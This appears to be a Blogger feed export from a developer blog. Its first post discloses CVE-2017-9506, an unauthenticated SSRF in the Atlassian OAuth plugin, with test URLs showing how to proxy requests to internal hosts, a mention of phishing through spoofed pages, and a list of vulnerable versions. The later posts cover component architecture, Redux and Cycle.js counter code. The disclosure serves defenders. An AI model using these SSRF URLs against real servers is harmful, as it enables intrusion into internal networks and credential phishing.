tag:blogger.com,1999:blog-89627632533873340812024-03-18T10:48:25.436+01:00Don't PanicThijs Vonkhttp://www.blogger.com/profile/12161242264508748111noreply@blogger.comBlogger136125tag:blogger.com,1999:blog-8962763253387334081.post-58404316496783758582017-12-04T09:15:00.000+01:002017-12-04T09:25:15.587+01:00There is a proxy in your Atlassian Product! (CVE-2017-9506)<h1 dir="ltr" id="docs-internal-guid-601342e3-12f7-3b31-0cea-0732710536e6" style="line-height: 1.38; margin-bottom: 6pt; margin-top: 24pt;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"></span></h1>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">You might not know it but the Atlassian OAuth plugin is part of most Atlassian products such as Jira and Confluence. Until recently it had a vulnerability that allowed the unauthenticated execution of HTTP GET requests from the server. You can do all kinds of interesting things with it, like accessing resources on the internal network or spoofing pages with a valid TLS connection. </span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">In this blog post I will describe the vulnerability, explain how it works, how to test for it and why it is a bad thing TM.</span></span></div>
<a name='more'></a><span style="font-family: "arial" , "helvetica" , sans-serif;"></span><br />
<h2 dir="ltr" style="line-height: 1.38; margin-bottom: 4pt; margin-top: 18pt;">
<span style="font-size: large;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">The vulnerability</span></span></span></h2>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">As part of my research for <a href="https://www.atlasscan.com/" target="_blank">Atlasscan</a> I sometimes browse the Atlassian JIRA in search for security related issues and see if I can test for them. Last weekend I stumbled upon </span><a href="https://ecosystem.atlassian.net/browse/OAUTH-344" target="_blank">OAuth-344</a>, which is the vulnerability we're talking about. It sounded interesting so I decided to have a look.</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">It is nice that the Atlassian OAuth plugin is open source, so you can</span><span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><a href="https://bitbucket.org/atlassian/atlassian-oauth/commits/cacd1a118fdc3dc7562d48110340b3de4f0b0af9" target="_blank">examine the commits that fixed the issue</a>. There was an <span style="font-family: "courier new" , "courier" , monospace;"><span style="font-family: "courier new" , "courier" , monospace;">IconUriServle</span>t</span> that accepted a GET request and took the value from the <span style="font-family: "courier new" , "courier" , monospace;">consumerUri</span> parameter and used it to create another HTTP GET request, this time executed from the server. The response from the request was then streamed back across the original request. That is proxy functionality alright!</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjZVso9LLJCmrywF-hLBPNUxSjepLKtJPWST0_oENcAXwB9vn2UZY4hPLYg_8PT1kCT344Ek2IZG6L1Df62v6CoHVcJ67KuqDHE7ZwImi5KKkO_2bLqeT6CIdo2hEH9Jj0zrQT2YLNiwVfu/s1600/OAuth-344.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="437" data-original-width="890" height="314" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjZVso9LLJCmrywF-hLBPNUxSjepLKtJPWST0_oENcAXwB9vn2UZY4hPLYg_8PT1kCT344Ek2IZG6L1Df62v6CoHVcJ67KuqDHE7ZwImi5KKkO_2bLqeT6CIdo2hEH9Jj0zrQT2YLNiwVfu/s640/OAuth-344.png" width="640" /></a></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Knowing that the functionality exists is one thing, but you also need to know which URL to call. A part can be derived from the source code, the other part from the </span><a href="https://developer.atlassian.com/jiradev/jira-apis/about-the-jira-rest-apis/jira-rest-api-tutorials/jira-rest-api-example-oauth-authentication#JIRARESTAPIExample-OAuthauthentication-Step2:Configuringtheclient" target="_blank">documentation</a>.</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjBfjI9sz9P5jVZTIh03avA3c-NfTa8UdiEPuxAIsJEHOXuY9vicpRDBwdfkm0wvEXXu24I7RdmF1zAF7Y-laXh8GUdx3VdK14bq3zTQnPNqfYaQfpmjNmVGno34BxlDRoYLVpTooNbNguv/s1600/OAuth-344-2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="64" data-original-width="1159" height="34" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjBfjI9sz9P5jVZTIh03avA3c-NfTa8UdiEPuxAIsJEHOXuY9vicpRDBwdfkm0wvEXXu24I7RdmF1zAF7Y-laXh8GUdx3VdK14bq3zTQnPNqfYaQfpmjNmVGno34BxlDRoYLVpTooNbNguv/s640/OAuth-344-2.png" width="640" /></a></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"></span></div>
<h2 dir="ltr" style="line-height: 1.38; margin-bottom: 4pt; margin-top: 18pt;">
<span style="font-size: large;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">How to Test for the vulnerability</span></span></span></h2>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">So in order to test if the vulnerability is present you need to form an URL like so:</span></span></div>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "courier new" , "courier" , monospace;"><span style="font-family: "courier new" , "courier" , monospace;"><span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">https://%basepath%/plugins/servlet/oauth/users/icon-uri?consumerUri=https://www.google.nl</span></span></span></div>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">If you execute this request in a browser (and replace <span style="font-family: "courier new" , "courier" , monospace;"><span style="font-family: "courier new" , "courier" , monospace;">%basepath%</span></span> with your Atlassian product base path :-) and are greeted with a Google page you now know which URL to block :-) If however you get a 404 all is well because the servlet no longer exists in newer versions of the plugin.</span></span></div>
<h2 dir="ltr" style="line-height: 1.38; margin-bottom: 4pt; margin-top: 18pt;">
<span style="font-size: large;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Why is this a bad thing TM?</span></span></span></h2>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Well first of all, because the server executes an HTTP request with an URL of your choice and returns the results, you can access any resource the server has access to.</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Often the server resides on an internal network and if you know or guess the name of any http resources on that network you can access them. For example a vulnerable Jira server is accessible from the internet, but an internal Confluence is only available on the internal network. You could access it with an URL like this: </span></span></div>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "courier new" , "courier" , monospace;"><span style="font-family: "courier new" , "courier" , monospace;"><span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">https://jira.company.com/plugins/servlet/oauth/users/icon-uri?consumerUri=https://confluence.company.com/</span></span></span></div>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Secondly you can use this feature to phish for credentials by accessing a spoofed login page through this URL. The TLS lock is green, domain name checks out, but you may be looking at code from a whole different domain. Also you can use this to serve untrustworthy content using a trusted domain (think ads and worse).</span></span></div>
<h2 dir="ltr" style="line-height: 1.38; margin-bottom: 4pt; margin-top: 18pt;">
<span style="font-size: large;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Conclusion</span></span></span></h2>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">I think this vulnerability has not received the attention it deserves. The administrators I have talked to so far were unaware of it. This kind of makes sense because it never featured on the <a href="https://www.atlassian.com/trust/security" target="_blank">Atlassian security</a> page and <a href="https://nvd.nist.gov/vuln/detail/CVE-2017-9506" target="_blank">CVE-2017-9506</a> listed only the OAuth component, not the products.</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">So, if you find your Atlassian product vulnerable please inform your administrator and ask him to block the URL or upgrade to a later version of your product.</span></span></div>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">According to the Atlassian Jira the following versions are vulnerable:</span></span></div>
<ul style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Bamboo < 6.0.0</span></span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Confluence < 6.1.3</span></span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Jira < 7.3.5</span></span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Bitbucket < 4.14.4</span></span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Crowd < 2.11.2</span></span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Crucible & Fisheye < 4.3.2</span></span></div>
</li>
</ul>
Anonymoushttp://www.blogger.com/profile/16306207520582389200noreply@blogger.com193tag:blogger.com,1999:blog-8962763253387334081.post-29486048062262309122016-08-04T17:10:00.000+02:002016-08-04T17:11:14.088+02:00Post-MVC part 8: Conclusions<h2>
Intro</h2>
In this series we've learned about the benefits of a Component based architecture and we have seen how it differs from the traditional MVC architecture.<br />
<br />
A Component based architecture is a Tree of Components in which each Component takes care of a part of the UI of an application. We saw that managing state for a Tree of Components can be difficult because the state lives in various locations.<br />
<br />
We also saw that communication between Components can be difficult because a Component can only talk with his children or with his parents. Components that need to talks to their siblings or nephews require channels to be opened through their parents.<br />
<br />
We learned about unidirectional data flows and about observables, two ways to reduce the complexity of a Component based architecture.<br />
<br />
This week I want to share my personal opinions and experiences about Components, Redux, Cycle.js, Observables etc etc.
<a name='more'></a><br />
<h2>
MVC vs Components</h2>
Personally I prefer Components. I've been exploring Components based architectures for quite some time now and I've come to the conclusion that I find that it fits better when building UI's.<br />
<br />
<h3>
Coupling</h3>
<br />
Whenever I used MVC I always had a feeling things did not quite fit. The main reason for this is that there was supposed to be a loose coupling between the controller and the view. The reality however was that they were very tightly coupled.<br />
<br />
Whenever the controller changed the view had to be updated as well. When you re-factor the name of an 'event' the view had to be updated to use the new name as well. If the view was changed significantly it almost always meant that the data structure in the controller had to change as well to make it easier for the view.<br />
<br />
Of course this will be the same for the Component. Whenever the JavaScript changes the template must be updated as well, whether that template is JSX or Handlebars or Angular's template syntax. The difference is that the Component architecture says that this is not a problem. It doesn't claim that there should be a low coupling between them.<br />
<br />
So say that the Controller and View were loosely coupled in MVC was simply disingenuous. With Components I feel that this charade has finally come to an end.<br />
<br />
A Component marries the 'controller' and 'view' very tightly together into one single concept. Finally the way I wrote the code was reflected in the architecture that I used.<br />
<br />
<h3>
Conceptually easier</h3>
<br />
With MVC I always feel that I'm building something simple out of complex pieces. With Components I feel that I'm building something complex made out of simple pieces.<br />
<br />
For example in MVC I would often write code for relatively simple screens such as a list where you can traverse through some model via pagination, with edit, delete and view functionality. The idea is relatively simple, but the code quickly became complex. The controller would get bloated, the view's would get huge.<br />
<br />
When another view was introduced which was also a list the code would often end up duplicated. The correct thing to do is to make the list a Component, but you where not always guided to this solution. Maybe I can write some 'mixins' for my controller, or write a partial for my views. It reduces the total lines of code, but is a very poor layer of abstraction.<br />
<br />
When you go full Component it is clear that the solution is a generic list component. The code used to build the application specific UI are Components, the code for re-usable widgets are also Components. This means that you have one abstraction for both use cases, which makes Components in my opinion conceptually easier to understand.<br />
<br />
<h3>
Easier to re-use</h3>
<br />
Since Components are isolated and have very explicit communication semantics, they are ideally suited for re-use. Of course in the traditional MVC this was also the case for the widgets that we re-used, which where sort of Proto-Components.<br />
<br />
The difference was that when you decided that a widget was re-usable as a Component you would have to extract parts out of the View. With Components you are already building isolated widgets.<br />
<br />
<h3>
Is it really that different?</h3>
<br />
In some ways a Component architecture is just a special variant of the MVC architecture. I'd like to view Components as a group of very tiny MVC applications which work together to tackle a bigger<br />
problem.<br />
<br />
This means that we do not have to learn everything all over again. We only need to get into the Component mindset.<br />
<h2>
Managing State and Events</h2>
So if you make the plunge and go for a Component based architecture you will soon run into the limitations. Namely that the state will be stored in multiple different Components, and that Components will start developing multiple lines of communication to each other.<br />
<br />
We've seen that Redux (unidirectional data flow) and Reactive Programming can reduce these problems. So which one do you pick.<br />
<br />
<h3>
Rx.js vs Redux </h3>
<br />
Redux is strong at managing you state for your entire application. It is an architecture for how to deal with state. It makes sure that your applications state is not shattered through out the Component. It allows communication between Components through manipulation of commonly shared state.<br />
<br />
Rx.js is used for asynchronous programming it makes it easier to deal with events. What is also beautiful is that the Components are Reactive, they themselves define to which events they respond from inside the Component itself, and not through being manipulated via some external call. It allows communication because one Component can generate events to which another Component can listen to, without them knowing each other explicitly.<br />
<br />
Rx.js and Redux do not exclude each other you can use them at the same time if you want to. So it actually is not a fight.<br />
<br />
<h3>
What about Cycle.js</h3>
<br />
Cycle.js is a really cool project which shows how great an application which uses Observables can be. The downsides are that the project doesn't have the developer tools that Redux does provide.<br />
<br />
Also I find that it is very difficult do jump into the "everything is a stream" mentality. Getting new developers on board is in my opinion more difficult.<br />
<br />
Also Cycle.js is a relatively smaller project than lets say React, Ember or Angular. This means Cycle.js doesn't have the big community that the others have, so it is harder to ask for help.<br />
<br />
But who knows things may be different in a couple of years.<br />
<h2>
Recommendations</h2>
So what do I recommend?<br />
<br />
Personally I recommend using Redux first and Rx.JS later. By using Redux you get a pretty solid way to deal with state. This combined with the developer tools that are available for Redux provides a great developer experience. Redux is also relatively easy to explain to developers, developers new to Redux should become productive quickly.<br />
<br />
When Components start relying heavily on asynchronous events, Rx.js might be a good fit to use for some Components, such as an autocomplete search box. At the end of a Stream you can then dispatch back to the Redux store to update the state.<br />
<br />
In theory you could use Rx.js to create your own Redux like implementation. An Angular 2.0 library called: <a href="https://github.com/ngrx/store">ngrx/store</a> does just this. It proves that Rx.js can be used to implement Redux like stores. Since 42 B.V. is an Angular shop I'm going to investigate this approach.<br />
<div>
<br /></div>
Anonymousnoreply@blogger.com7tag:blogger.com,1999:blog-8962763253387334081.post-7855332434792620802016-07-28T09:36:00.001+02:002016-08-04T17:10:52.931+02:00Post-MVC part 7: Cycle.js<h2>
Intro</h2>
<a href="http://dontpanic.42.nl/2016/07/reactive-programming.html">Last week</a> we took a look at Reactive Programming and Observables. We saw the power that the Observables bring to the table, a very strong separation of concerns between components.<br />
<br />
This week I want to take a look at <a href="http://cycle.js.org/">Cycle.js</a> which is a library which lets you create Components which take in observables as input and return observables as an output.
<br />
<a name='more'></a><br />
<h2>
Cycle.js</h2>
The name Cycle.js comes from the way a Cycle.js application is structured. The philosophy behind Cycle.js is that both the computer and the user behind the computer are constantly observing and reacting to each other in a perpetual cycle.<br />
<br />
The computer displays some data to the user. The user sees this data and moves his mouse in order to manipulate the data. The computer responds to this event by changing the data on the screen.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-SXypr7257ew/V5mwZXajD8I/AAAAAAAAAFc/bjhjSMCG4fAEjA3PfXpSlBzqn53j4CiZACLcB/s1600/HCI.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="259" src="https://2.bp.blogspot.com/-SXypr7257ew/V5mwZXajD8I/AAAAAAAAAFc/bjhjSMCG4fAEjA3PfXpSlBzqn53j4CiZACLcB/s320/HCI.png" width="320" /></a></div>
<br />
<br />
Lets dive into some concepts behind Cycle.js.<br />
<h2>
Everything is a stream.</h2>
Cycle.js is observables all they way from the top to the bottom. Everything is a Stream that can be observed. This includes HTTP Request, LocalStorage reads and writes, DOM Events etc etc. But even Components in Cycle.js take streams as input and produce streams as output.<br />
<h2>
Sources & Sinks</h2>
In Cycle.js a Component takes in a collection of 'sources' and produces a 'sink'.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-FSnDdDix2po/V5mw2dhq2hI/AAAAAAAAAFg/y8MpgVIVBus7t0uo9IhixrAg2KtV9fyMACLcB/s1600/sinks%2Band%2Bsources.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="159" src="https://3.bp.blogspot.com/-FSnDdDix2po/V5mw2dhq2hI/AAAAAAAAAFg/y8MpgVIVBus7t0uo9IhixrAg2KtV9fyMACLcB/s320/sinks%2Band%2Bsources.png" width="320" /></a></div>
<br />
<br />
The 'sources' are all the observables that the Component needs to listen to in order to do its job. For example the Component might need to listen to DOM events so it takes the DOM observable out of the 'sources'.<br />
<br />
The 'sink' (think kitchen sink) is the end drain point of a Component. It is the collection of observables that the Component itself produces. For example a stream of HTML which represents the Component. Or a stream of values for when the Component acts as an input mechanism for a HTML<br />
form.<br />
<h2>
A Counter Component</h2>
Lets create the Counter Component from the post about Redux in Cycle.js. Remember the Component is very simple it has two buttons one to increment the count and one to decrement the count.<br />
<br />
Here is the code:<br />
<pre> <code class="javascript">
// The Counter component
function Counter(sources) {
// INTENT: Listen to increment and decrement clicks.
const increment$ = sources.DOM.select('.increment')
.events('click').map(() => +1);
const decrement$ = sources.DOM.select('.decrement')
.events('click').map(() => -1);
/*
MODEL: The count$ stream represents the current count of the counter.
The state is kept by merging the increment$ and decrement$ streams,
and then 'scanning' them on the current count.
Let's say the user clicks decrement, then increment, and then
the decrement again. The marble graph of the streams
to visually see what is happening:
increment$: === -1 ======= -1 ===
decrement$: ========= +1 ========
---------------------------------
merged: ====-1 == +1 = -1 ===
---------------------------------
scan: ==== -1 == 0 = -1 ===
The 'scan' operator takes the current count, which starts at
0 thanks to 'startsWith' and each time a new 'merged' value
is available runs the function. In this case the function simply
takes the current count and adds the modifier on top of it. The
value that is returend from 'scan' is the next count.
In ascii form:
=============================
| count | modifier | result |
=============================
| 0 | -1 | -1 |
-----------------------------
| -1 | +1 | 0 |
-----------------------------
| 0 | -1 | -1 |
=============================
*/
const count$ = Rx.Observable
.merge(increment$, decrement$) // Merge clicks from the buttons into one stream
.startWith(0) // Start the count at zero.
.scan((count, mod) => count + mod); // Take the current count either -1 or +1 it.
/*
VIEW: Create a stream which represents the UI of the counter.
Each time the count$ produces a new value the UI should be
re-created.
vtree$ stands for 'virtual DOM tree' a Virtual DOM is a structure
representing a DOM structure but is not the actual DOM. Cycle.js
uses a Virtual DOM to check what the difference is with the actual
real DOM. When things differ only the differences are patched back
to the actual DOM minimizing the DOM operations needed.
A video about what a Virtual DOM is: https://www.youtube.com/watch?v=a21b-KDHG-Q
*/
const vtree$ = count$.map(counter =>
CycleDOM.div([
CycleDOM.h1("Counter"),
CycleDOM.button('.decrement', '-'),
CycleDOM.span(String(counter)),
CycleDOM.button('.increment', '+')
]));
const sinks = {
DOM: vtree$
};
return sinks;
};
/*
Here Cycle.js will actually make sure our Counter app
is run. Cycle.run takes the Counter function so it can
and executes it so it can take the 'sinks' which it passes
to the CycleDOM driver. A driver takes a 'sink' and performs
an operation with side effects. The DOM driver will take a
stream of DOM (vtree$) and renders it into an actual DOM element,
in this case the #content <div>.
*/
Cycle.run(Counter, {
DOM: CycleDOM.makeDOMDriver('#content')
});
</code>
</pre>
A live example can be found here: <a href="http://codepen.io/anon/pen/oxaPpP?editors=0010">http://codepen.io/anon/pen/oxaPpP?editors=0010</a><br />
<br />
From reading the comments in the snippet above you can get a pretty good feel about what the Component does. It takes the stream of DOM and listens to the clicks on the buttons, then it takes those click events and uses it to modify the 'count'. When the count changes the HTML is re-rendered.<br />
<br />
There is a pattern to the way the Components are defined. First we state all the 'Intents' the Component responds to, aka all actions from the outside world that can influence it, these are the clicks on the decrement and increment buttons.<br />
<br />
Then we take the Intents an we transform them into a Model. The Model represents the state for a Component.<br />
<br />
The View then listens to the Model and whenever the Model updates the View is re-rendered.<br />
<br />
This pattern is called: Model-View-Intent. The pattern is used throughout every Component in Cycle.js.<br />
<br />
Also notice that the HTML produces by the Component later ends up back as a 'source' for the same Component. This is why Components in Cycle.js are in a perpetual Cycle and where the name Cycle.js comes from.<br />
<h2>
Communication between Components</h2>
The Counter Component example only showed a single Counter but no inter Component communication. Let's look at a more complex example: an application which has multiple counters, and has a total count for all counters combined.<br />
<pre><code class="javascript">
// The Counter component
function Counter(sources) {
// Listen to increment and decrement clicks.
const increment$ = sources.DOM.select('.increment')
.events('click').map(() => +1);
const decrement$ = sources.DOM.select('.decrement')
.events('click').map(() => -1);
const count$ = Rx.Observable.merge(increment$, decrement$)
.startWith(0)
// Track 'count' even when re-created when 'Create Counter' is clicked.
.shareReplay()
// Take the current count and perform either -1 or + 1 on it.
.scan((count, modifier) => count + modifier);
const vtree$ = count$.map(counter =>
CycleDOM.div([
CycleDOM.button('.decrement', '-'),
CycleDOM.span(String(counter)),
CycleDOM.button('.increment', '+')
]));
// Expose the count$ so external Components can observe it.
const sinks = {
DOM: vtree$,
count$: count$
};
return sinks;
}
function CounterList(sources) {
// INTENT
// Whenever 'Create Counter' button is clicked add a new IsolatedCounter.
const addCounter$ = sources.DOM.select('.create-counter')
.events('click')
.map(() => IsolatedCounter(sources));
// Whenever the user clicks on the 'remove' button remove the counter.
const removeCounter$ = sources.DOM.select('.remove')
.events('click')
.map(() => event.target.index);
// MODEL
/*
Creates the counters$ observable by merging two other streams:
the addCounter$ and removeCounter$. Whenever one or two fires
an event it will manipulate the list of counters.
The list initially starts of as an empty array via the 'startWith'
operator.
When either addCounter$ or removeCounter$ fires they respective
reducer functions are put on the stream. This causes 'scan' to
trigger applying either the addCounter or removeCounter function
on the current list. The result will be the next value of the
counter$.
*/
const counters$ = Rx.Observable.merge(
addCounter$.map(counter => addCounter(counter)),
// Add a new removeCounter reducer function on the stream.
removeCounter$.map(index => removeCounter(index))
)
.startWith([])
.scan((counters, operation) => operation(counters))
.share(); // share so the totalCount$ and vtree$ each get their own fork.
/*
Calculates the totalCount and makes it available as totalCount$.
The counters$ produces an array of Counter components. The counter
objects have a count$ property we want each of those counts and
add them together.
It does this by combining each Counter component's count$ into
another stream which will produce an array via 'combineLatest'.
The array combineLatest produces is then summed up via a 'reduce'.
The reason we use 'flatMapLatest' on the counters$ is that
'combineLatest' also produces an observable. We do not want to
get that 'observable' we want whatever it is producing!
The 'flatMap' takes the observable that 'combineLatest' produces,
observes it and whenever combineLatest produces something, 'flatMap'
simply produces it to. See this video which explains it on egghead:
https://egghead.io/lessons/rxjs-rxjs-map-vs-flatmap
*/
const totalCount$ = counters$.flatMapLatest(counters => {
return Rx.Observable.combineLatest(counters.map(counter => counter.count$))
.map(ar => ar.reduce((total, count) => total + count, 0));
}).startWith(0);
/*
VIEW
Combine the counters$ and the totalCount$ whenever one of them
produces a value, take the latest value of both of them produced
and render a Virtual DOM tree with them.
*/
const vtree$ = counters$.combineLatest(totalCount$,
(counters, totalCount) =>
CycleDOM.div([
CycleDOM.h1('Counters'),
CycleDOM.div(counters.map((counter, index) =>
CycleDOM.div([
counter.DOM,
CycleDOM.button('.remove', { index: index }, 'remove')
])
)),
CycleDOM.button('.create-counter', 'Create Counter'),
CycleDOM.h2('Total: ' + totalCount)
])
);
const sinks = {
DOM: vtree$
};
return sinks;
}
// Takes a counter and adds it to the counter list.
function addCounter(counter) {
// Inner reducer function, is given the list of counters.
return function(counters) {
return counters.concat(counter); // Add the counter.
}
}
